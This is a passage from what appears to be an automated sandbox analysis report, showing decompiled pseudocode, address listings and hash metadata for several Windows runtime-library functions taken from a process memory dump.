																	__eflags = 0;
																	L011270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0114FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0114FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0114FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0114FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0114FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1207b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1207b84 = _t75;
						_t73 = E0112EB70(_t134, 0x1207b60);
						if( *0x1207b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0112FF60( *0x1207b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                      0x0114fab0
                                                      0x0114fab2
                                                      0x0114fab3
                                                      0x0114fab4
                                                      0x0114fabc
                                                      0x0114fac0
                                                      0x0114fb14
                                                      0x0114fb17
                                                      0x0114fac2
                                                      0x0114fac8
                                                      0x0114facd
                                                      0x0114fad3
                                                      0x0114fad3
                                                      0x0114fadd
                                                      0x0114fb18
                                                      0x0114fb1b
                                                      0x0114fb1d
                                                      0x0114fb1e
                                                      0x0114fb1f
                                                      0x0114fb20
                                                      0x0114fb21
                                                      0x0114fb22
                                                      0x0114fb23
                                                      0x0114fb24
                                                      0x0114fb25
                                                      0x0114fb26
                                                      0x0114fb27
                                                      0x0114fb28
                                                      0x0114fb29
                                                      0x0114fb2a
                                                      0x0114fb2b
                                                      0x0114fb2c
                                                      0x0114fb2d
                                                      0x0114fb2e
                                                      0x0114fb2f
                                                      0x0114fb3a
                                                      0x0114fb3b
                                                      0x0114fb3e
                                                      0x0114fb41
                                                      0x0114fb44
                                                      0x0114fb47
                                                      0x0114fb4a
                                                      0x0114fb4d
                                                      0x0114fb53
                                                      0x0118bdcb
                                                      0x0118bdcb
                                                      0x0114fb59
                                                      0x0114fb5b
                                                      0x0114fb5b
                                                      0x0114fb5e
                                                      0x0118bdd5
                                                      0x0118bdd8
                                                      0x00000000
                                                      0x0118bdda
                                                      0x00000000
                                                      0x0118bdda
                                                      0x0114fb64
                                                      0x0114fb64
                                                      0x0114fb64
                                                      0x0114fb67
                                                      0x0114fb6e
                                                      0x0114fb70
                                                      0x0114fb72
                                                      0x00000000
                                                      0x0114fb78
                                                      0x0114fb7a
                                                      0x0114fb7a
                                                      0x0114fb7d
                                                      0x0114fb80
                                                      0x0118bddf
                                                      0x0118bde1
                                                      0x00000000
                                                      0x0118bde3
                                                      0x00000000
                                                      0x0118bde3
                                                      0x0114fb86
                                                      0x0114fb86
                                                      0x0114fb86
                                                      0x0114fb8b
                                                      0x0114fb90
                                                      0x0114fb92
                                                      0x0114fb94
                                                      0x0114fb9a
                                                      0x0114fb9b
                                                      0x0114fba1
                                                      0x0118bde8
                                                      0x0118bdeb
                                                      0x0118bded
                                                      0x0118beb5
                                                      0x0118beb5
                                                      0x0118bebb
                                                      0x0118bebd
                                                      0x0118bec3
                                                      0x0118bed2
                                                      0x0118bedd
                                                      0x0118bedd
                                                      0x0118beed
                                                      0x00000000
                                                      0x0118bdf3
                                                      0x0118bdfe
                                                      0x0118be06
                                                      0x0118be0b
                                                      0x0118be0d
                                                      0x0118be0f
                                                      0x0118be14
                                                      0x0118be19
                                                      0x0118be20
                                                      0x0118be25
                                                      0x0118be27
                                                      0x0118be35
                                                      0x0118be39
                                                      0x0118be46
                                                      0x0118be4f
                                                      0x0118be54
                                                      0x0118be56
                                                      0x0118bef8
                                                      0x0118bef8
                                                      0x00000000
                                                      0x0118be5c
                                                      0x0118be5c
                                                      0x0118be60
                                                      0x00000000
                                                      0x0118be66
                                                      0x0118be66
                                                      0x0118be7f
                                                      0x0118be84
                                                      0x0118be87
                                                      0x0118be89
                                                      0x0118be8b
                                                      0x0118be99
                                                      0x0118be9d
                                                      0x0118bea0
                                                      0x0118beac
                                                      0x0118beaf
                                                      0x0118beb1
                                                      0x0118beb3
                                                      0x0118beb3
                                                      0x00000000
                                                      0x0118bea2
                                                      0x0118bea2
                                                      0x00000000
                                                      0x0118bea2
                                                      0x0118be8d
                                                      0x0118be8d
                                                      0x0118be92
                                                      0x00000000
                                                      0x0118be92
                                                      0x0118be8b
                                                      0x0118be60
                                                      0x0118be3b
                                                      0x0118be3b
                                                      0x0118be3e
                                                      0x00000000
                                                      0x0118be40
                                                      0x0118be40
                                                      0x0118be44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0118be44
                                                      0x0118be3e
                                                      0x0118be29
                                                      0x0118be29
                                                      0x00000000
                                                      0x0118be29
                                                      0x0118be27
                                                      0x00000000
                                                      0x0114fba7
                                                      0x0114fba7
                                                      0x0114fbab
                                                      0x0118bf02
                                                      0x0114fbb1
                                                      0x0114fbb1
                                                      0x0114fbb8
                                                      0x0114fbbd
                                                      0x0114fbbd
                                                      0x0114fbbf
                                                      0x0114fbbf
                                                      0x0114fbc5
                                                      0x0114fbcb
                                                      0x0114fbf8
                                                      0x0114fbf8
                                                      0x0114fbfa
                                                      0x00000000
                                                      0x0114fc00
                                                      0x0114fc00
                                                      0x0114fc03
                                                      0x00000000
                                                      0x0114fc09
                                                      0x0114fc09
                                                      0x0114fc0f
                                                      0x0114fc15
                                                      0x0114fc23
                                                      0x0114fc23
                                                      0x0114fc25
                                                      0x0114fc27
                                                      0x0114fc75
                                                      0x0114fc7c
                                                      0x0114fc84
                                                      0x00000000
                                                      0x0114fc29
                                                      0x0114fc29
                                                      0x0114fc2d
                                                      0x0114fc30
                                                      0x0118bf0f
                                                      0x00000000
                                                      0x0114fc36
                                                      0x0114fc38
                                                      0x0114fc3b
                                                      0x0114fc41
                                                      0x0118bf17
                                                      0x0118bf19
                                                      0x0118bf48
                                                      0x0118bf4b
                                                      0x00000000
                                                      0x0118bf1b
                                                      0x0118bf22
                                                      0x0118bf24
                                                      0x0118bf26
                                                      0x00000000
                                                      0x0118bf2c
                                                      0x0118bf37
                                                      0x0118bf39
                                                      0x0118bf3b
                                                      0x00000000
                                                      0x0118bf41
                                                      0x0118bf41
                                                      0x0118bf41
                                                      0x0118bf41
                                                      0x0118bf45
                                                      0x00000000
                                                      0x0118bf45
                                                      0x0118bf3b
                                                      0x0118bf26
                                                      0x00000000
                                                      0x0114fc47
                                                      0x0114fc47
                                                      0x0114fc49
                                                      0x0114fcb2
                                                      0x0114fcb4
                                                      0x0114fcb6
                                                      0x0114fcdc
                                                      0x0114fcdc
                                                      0x00000000
                                                      0x0114fcb8
                                                      0x0114fcc3
                                                      0x0114fcc5
                                                      0x0114fcc7
                                                      0x00000000
                                                      0x0114fcc9
                                                      0x0114fcc9
                                                      0x0114fccd
                                                      0x00000000
                                                      0x0114fccd
                                                      0x0114fcc7
                                                      0x00000000
                                                      0x0114fc4b
                                                      0x0114fc4b
                                                      0x0114fc4e
                                                      0x0114fc4e
                                                      0x0114fc51
                                                      0x0114fc51
                                                      0x0114fc54
                                                      0x0114fc5a
                                                      0x0114fc5c
                                                      0x0114fc5f
                                                      0x0114fc61
                                                      0x0114fc63
                                                      0x0114fc65
                                                      0x0114fc67
                                                      0x0114fc6e
                                                      0x0114fc72
                                                      0x0114fc72
                                                      0x0114fc72
                                                      0x0114fc72
                                                      0x0114fc67
                                                      0x0114fc61
                                                      0x00000000
                                                      0x0114fc5a
                                                      0x0114fc49
                                                      0x0114fc41
                                                      0x0114fc30
                                                      0x0114fc27
                                                      0x0114fc03
                                                      0x0114fbcd
                                                      0x0114fbd3
                                                      0x0114fbd9
                                                      0x0114fbdc
                                                      0x0114fbde
                                                      0x0114fc99
                                                      0x0114fc9b
                                                      0x0114fc9d
                                                      0x0114fcd5
                                                      0x0114fcd5
                                                      0x0114fc89
                                                      0x0114fc89
                                                      0x00000000
                                                      0x0114fc9f
                                                      0x0114fc9f
                                                      0x0114fca3
                                                      0x00000000
                                                      0x0114fca3
                                                      0x00000000
                                                      0x0114fbe4
                                                      0x0114fbe4
                                                      0x0114fbe4
                                                      0x0114fbe4
                                                      0x0114fbe9
                                                      0x0114fbf2
                                                      0x00000000
                                                      0x0114fbf2
                                                      0x0114fbde
                                                      0x0114fbcb
                                                      0x0114fbab
                                                      0x0114fc8b
                                                      0x0114fc8b
                                                      0x0114fc8c
                                                      0x0114fb80
                                                      0x0114fb72
                                                      0x0114fb5e
                                                      0x0114fc8d
                                                      0x0114fc91
                                                      0x0114fadf
                                                      0x0114fadf
                                                      0x0114fae1
                                                      0x0114fae4
                                                      0x0114fae7
                                                      0x0114faec
                                                      0x0114faf8
                                                      0x0114fb00
                                                      0x0114fb07
                                                      0x0114fb0f
                                                      0x0114fb0f
                                                      0x0114fb07
                                                      0x00000000
                                                      0x0114faf8
                                                      0x0114fadd

                                                      Strings
                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0118BE0F
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                      • API String ID: 0-865735534
                                                      • Opcode ID: 1736bd0a11869f141e6af955a050ed4b3089b75b4c4dcaffcde4b28921e08004
                                                      • Instruction ID: 0bd059518692b17d2f451f0b8780e0118c72a965c6fcd323bbb14d10e64735c7
                                                      • Opcode Fuzzy Hash: 1736bd0a11869f141e6af955a050ed4b3089b75b4c4dcaffcde4b28921e08004
                                                      • Instruction Fuzzy Hash: DFA10431B00A178FEB2EDF6CC450BAEB7A5AF44B24F054669D946DB781DB30D802CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01112D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 63%
                                                      			E01112D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1205350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1207bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E011597C0();
				}
				if( *0x12079c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x12079c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01141624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01137D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E011AFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01159520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0114E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0116DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1206901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1206901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01159980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E011595D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01137D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01137D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01197016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E011AFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1205350;
							if(_t109 != 0x1205350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E011AFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E011A5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                      0x01112d8a
                                                      0x01112d8a
                                                      0x01112d92
                                                      0x01112d96
                                                      0x01112d9e
                                                      0x01112da0
                                                      0x01112da3
                                                      0x01112da5
                                                      0x01112da8
                                                      0x01112dab
                                                      0x01112db2
                                                      0x0116f9aa
                                                      0x0116f9ab
                                                      0x0116f9ae
                                                      0x0116f9ae
                                                      0x01112db8
                                                      0x01112dc2
                                                      0x0116f9b9
                                                      0x0116f9be
                                                      0x0116f9bf
                                                      0x0116f9bf
                                                      0x01112dcf
                                                      0x0116f9c9
                                                      0x01112dd5
                                                      0x01112dd5
                                                      0x01112dd5
                                                      0x01112dde
                                                      0x01112de1
                                                      0x01112e70
                                                      0x01112e72
                                                      0x01112e72
                                                      0x01112de7
                                                      0x01112deb
                                                      0x01112e7c
                                                      0x01112e83
                                                      0x01112e85
                                                      0x01112e8b
                                                      0x01112e8d
                                                      0x01112e92
                                                      0x01112e92
                                                      0x01112e85
                                                      0x01112df1
                                                      0x01112df7
                                                      0x01112df9
                                                      0x01112df9
                                                      0x01112dfc
                                                      0x01112dff
                                                      0x01112e02
                                                      0x00000000
                                                      0x01112e05
                                                      0x01112e0c
                                                      0x0116f9d9
                                                      0x01112e12
                                                      0x01112e12
                                                      0x01112e12
                                                      0x01112e1a
                                                      0x0116f9e3
                                                      0x0116f9e9
                                                      0x0116f9f0
                                                      0x0116f9f6
                                                      0x0116f9f8
                                                      0x0116f9f8
                                                      0x0116f9f0
                                                      0x01112e23
                                                      0x0116fa02
                                                      0x0116fa03
                                                      0x0116fa05
                                                      0x0116fa06
                                                      0x00000000
                                                      0x01112e29
                                                      0x01112e29
                                                      0x01112e2e
                                                      0x01112e34
                                                      0x01112e3e
                                                      0x00000000
                                                      0x00000000
                                                      0x01112e44
                                                      0x01112e47
                                                      0x01112e4d
                                                      0x00000000
                                                      0x00000000
                                                      0x01112e4f
                                                      0x01112e54
                                                      0x00000000
                                                      0x00000000
                                                      0x01112e5a
                                                      0x01112e5f
                                                      0x01112e9a
                                                      0x01112ea4
                                                      0x01112ea5
                                                      0x01112ea8
                                                      0x01112eaf
                                                      0x01112eb2
                                                      0x01112eb5
                                                      0x0116fae9
                                                      0x0116faeb
                                                      0x0116faed
                                                      0x0116faef
                                                      0x0116faf7
                                                      0x0116faf8
                                                      0x0116fafd
                                                      0x0116faff
                                                      0x0116fb04
                                                      0x0116fb04
                                                      0x0116faff
                                                      0x01112ec0
                                                      0x01112ec4
                                                      0x01112ec6
                                                      0x01112ec8
                                                      0x0116fb14
                                                      0x0116fb18
                                                      0x0116fb1e
                                                      0x0116fb21
                                                      0x0116fb21
                                                      0x01112ece
                                                      0x01112ece
                                                      0x01112ece
                                                      0x01112ed7
                                                      0x01112e61
                                                      0x01112e63
                                                      0x0116fa6b
                                                      0x0116fa71
                                                      0x0116fa76
                                                      0x0116fa78
                                                      0x0116fa8a
                                                      0x0116fa7a
                                                      0x0116fa83
                                                      0x0116fa83
                                                      0x0116fa8f
                                                      0x0116fa91
                                                      0x0116fa97
                                                      0x0116fa9d
                                                      0x0116faa4
                                                      0x0116faaa
                                                      0x0116faaf
                                                      0x0116fab1
                                                      0x0116fac3
                                                      0x0116fab3
                                                      0x0116fabc
                                                      0x0116fabc
                                                      0x0116fac8
                                                      0x0116facb
                                                      0x0116fadf
                                                      0x0116fadf
                                                      0x0116facb
                                                      0x0116faa4
                                                      0x0116fa91
                                                      0x01112e6f
                                                      0x01112e6f
                                                      0x01112e5f
                                                      0x0116fa13
                                                      0x0116fa15
                                                      0x0116fa17
                                                      0x0116fa1f
                                                      0x0116fa21
                                                      0x0116fa22
                                                      0x0116fa25
                                                      0x0116fa28
                                                      0x0116fa2f
                                                      0x0116fa2f
                                                      0x0116fa2a
                                                      0x0116fa2a
                                                      0x0116fa2a
                                                      0x0116fa31
                                                      0x0116fa34
                                                      0x0116fa36
                                                      0x0116fa3c
                                                      0x0116fa3e
                                                      0x0116fa41
                                                      0x0116fa43
                                                      0x0116fa45
                                                      0x0116fa45
                                                      0x0116fa41
                                                      0x0116fa3c
                                                      0x0116fa4a
                                                      0x0116fa4f
                                                      0x0116fa51
                                                      0x0116fa53
                                                      0x0116fa56
                                                      0x0116fa5b
                                                      0x0116fa5e
                                                      0x00000000
                                                      0x0116fa5e
                                                      0x01112e23

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Re-Waiting
                                                      • API String ID: 0-316354757
                                                      • Opcode ID: a1a8ab3432577f5fb5c5620ddcf51c898ecb32fd6c011fc2682a87c0b44a23ec
                                                      • Instruction ID: 5753da73e5ce374b2b4c145a033f9c30a0531ecdb91e261d5e5cb617718d3fd9
                                                      • Opcode Fuzzy Hash: a1a8ab3432577f5fb5c5620ddcf51c898ecb32fd6c011fc2682a87c0b44a23ec
                                                      • Instruction Fuzzy Hash: C9617731A01606DFEB3EDF6CD854B7EBBA9EB40718F250279E911972C1C7319902C782
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E011E0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E011DFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E011E1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01159730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E011DA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E011DA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1208b04 >> 0x14) + (_v44 -  *0x1208b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01137D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E011D138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01137D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E011CFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1208724 & 0x00000008) != 0) {
						E011D52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E011E15B5(0x1208ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                      0x011e0eb7
                                                      0x011e0eb9
                                                      0x011e0ec0
                                                      0x011e0ec2
                                                      0x011e0ecd
                                                      0x011e105b
                                                      0x011e105b
                                                      0x011e1061
                                                      0x011e1066
                                                      0x011e1066
                                                      0x011e106b
                                                      0x011e1073
                                                      0x011e1073
                                                      0x011e0ed3
                                                      0x011e0ed6
                                                      0x011e0edc
                                                      0x011e0ee0
                                                      0x011e0ee7
                                                      0x011e0ef0
                                                      0x011e0ef5
                                                      0x011e0efa
                                                      0x011e0efc
                                                      0x011e0efd
                                                      0x011e0f03
                                                      0x011e0f04
                                                      0x011e0f06
                                                      0x011e0f07
                                                      0x011e0f09
                                                      0x011e0f0e
                                                      0x011e0f14
                                                      0x011e0f23
                                                      0x011e0f2d
                                                      0x011e0f34
                                                      0x011e0f34
                                                      0x011e0f14
                                                      0x011e0f52
                                                      0x00000000
                                                      0x00000000
                                                      0x011e0f58
                                                      0x011e0f73
                                                      0x011e0f74
                                                      0x011e0f79
                                                      0x011e0f7d
                                                      0x011e0f80
                                                      0x011e0f86
                                                      0x011e0fab
                                                      0x011e0fb5
                                                      0x011e0fc6
                                                      0x011e0fd1
                                                      0x011e0fe3
                                                      0x011e0fd3
                                                      0x011e0fdc
                                                      0x011e0fdc
                                                      0x011e0feb
                                                      0x011e1009
                                                      0x011e1009
                                                      0x011e1015
                                                      0x011e1027
                                                      0x011e1017
                                                      0x011e1020
                                                      0x011e1020
                                                      0x011e102f
                                                      0x011e103c
                                                      0x011e103c
                                                      0x011e1048
                                                      0x011e1050
                                                      0x011e1050
                                                      0x011e1055
                                                      0x00000000
                                                      0x011e1055
                                                      0x011e0f88
                                                      0x011e0f9e
                                                      0x011e0fa2
                                                      0x011e0fa9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x011e0fa9
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: c2bccabc08908442f7da2e55fc7333dd3c0f6d41e7c963b8871290b48562a932
                                                      • Instruction ID: b6573a7a479fcc27aa9ba9c662554d8fd44b55f26f8e85043103e64d249cea7e
                                                      • Opcode Fuzzy Hash: c2bccabc08908442f7da2e55fc7333dd3c0f6d41e7c963b8871290b48562a932
                                                      • Instruction Fuzzy Hash: AD518E713047429FD329DF68D888B1BBBE5EBC8714F04092CFA9697291D770E806CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0114F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E0114F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01134120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
